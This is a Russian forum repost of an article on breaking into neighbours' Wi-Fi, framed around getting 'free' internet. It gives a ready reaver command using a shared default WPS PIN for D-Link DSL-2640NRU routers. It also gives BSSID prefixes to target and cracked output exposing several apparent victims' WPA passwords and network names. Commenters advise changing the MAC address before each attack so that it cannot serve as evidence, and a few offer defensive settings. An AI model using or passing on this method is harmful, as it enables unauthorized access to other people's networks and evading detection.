1 Добавить топик в избранное

Получить доступ к соседскому Wi-Fi и как уберечься самому от подобного взлома. → Выживание

Статья не призывает пользователей совершать противоправные действия и представлена на данном ресурсе только в ознакомительных целях, для повышения IQ наших камрадов. Администрация сайта не несет ответственности за возможные проблемы при практическом использовании материалов данной статьи и призывает всех быть добропорядочными гражданами своей страны. Статья не моя — копипаст отсюда



Какой человек не любит халявы? Практически все ее просто обожают, и я не исключение. И я достал из недр харда BT5, скачанный ранее, и записал его на болванку. Результат не заставил себя ждать, и первый пароль был получен на следующее утро. И понеслась…

Однако, каково же было мое удивление, когда у второй жертвы оказался тот же пин-код, что и у первой (в частности такой: 46264848). Замечу, что роутеры были одинаковые, D'Link DSL 2640NRU, пожалуй, самая распостраненная модель на рынке. С версией прошивки 1.0.10.
В итоге, из 6 аппаратов (из них было 5 Д'Линков), попавшихся мне, у 4 были одинаковые пин-коды, которые, кстати, меняются после прошивки и восстанавливаются после обратного перехода на 1.0.10. В чем дело: одна партия роутеров? Одна прошивка? Не знаю, но факт остается фактом, время атаки на львиную долю роутеров можно сократить с 2-∞ часов до нескольких секуннд, учитывая, что большинству людей плевать на безопасность своей сети (из-за своей лени или невежества?).
Для этого нужно всего лишь вписать конкретный пин-код в команду Reaverу:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -p 46264848 -vv

В сухом остатке имеем:





Или так…

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '12316061989'
[+] AP SSID: 'Shat_SatyricoN'

[+] Pin cracked in 51 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3159801111'
[+] AP SSID: 'DOMIK'

[+] Pin cracked in 47 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '29051966'
[+] AP SSID: 'serg'

[+] Pin cracked in 17 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '19361'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3CQEPazxYCGY'
[+] AP SSID: 'Home'

[+] Pin cracked in 15 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'dimetriys80'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'ton_ton75'
[+] AP SSID: 'DSL_2640NRU'

(Надеюсь, хозяева сетей не читают Хабр)

BSSID роутеров, которые стоит попробовать на вкус, чаще всего начинаются с
B8:A3:86
C8:BE:19
1C:7E:E5 (полный список смотри тут)

Также замечу, что сети часто не переименовывают, и в списке доступных почти всегда висит по нескольку «DSL_2640NRU».

Полный список тут
  • Просмотры: 3171
  • Автор:      Комменты:
  • Поделиться

14 комментариев

avatar
Добрая статейка!
avatar
Баловался я в своё время Бэк Трэком и тоже успешно
Не забудьте, кстати, сменить свой МАС адрес перед каждой атакой
Комментарий отредактирован 2014-12-09 17:49:57 пользователем Gonscik
avatar
Тоже можно хакнуть МАК подделав… но уже тут только профи смогут
avatar
Лёха ты не понял, когда ты сам ломаешь то ОБЯЗАТЕЛЬНО смени свой МАС перед атакой, если загребут — будет уликой
в бэктреке есть macchenger, если мне память не изменяет
avatar
Да понятно, я имел ввиду что сменить на такой же как у тебя в системе — подделать. Ладно… разошлись и так тут ))
avatar
Какой же я динозавр, ничего в этом не понимаю
avatar
ставить шифрование не ниже WPA/WPA2-PSK, пароль циферно/буквенный с разным регистром. перебирать будут до «морковкиного заговения». даже с учетом уязвимости протокола…
avatar
Я так и делаю ))) пароль будешь подбирать лет 5ть ))) статья о тех кто роутер купил и просто включил с дефолтными настройками — таких миллионы
avatar
народ у нас дикий. сам ссид переименуют и запаролят, а вот доступ на веб-морду так и остается админ/админ. хрен ли там брутфорсить? )))
avatar
ну и это тоже… там у меня тоже лет 5ть будут ломать
avatar
Ну если пошла такая пьянка, то и SSID Broadcast отключить и МАС контроль включить
avatar
да, это тоже верные дополнения. )))
avatar
Да отсечку по мас адресу полезнаю штуковина, но гости охреневают когда просят пароль от ВиФи, а я прошу мас адрес)))
avatar
Ни слова не понял.
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.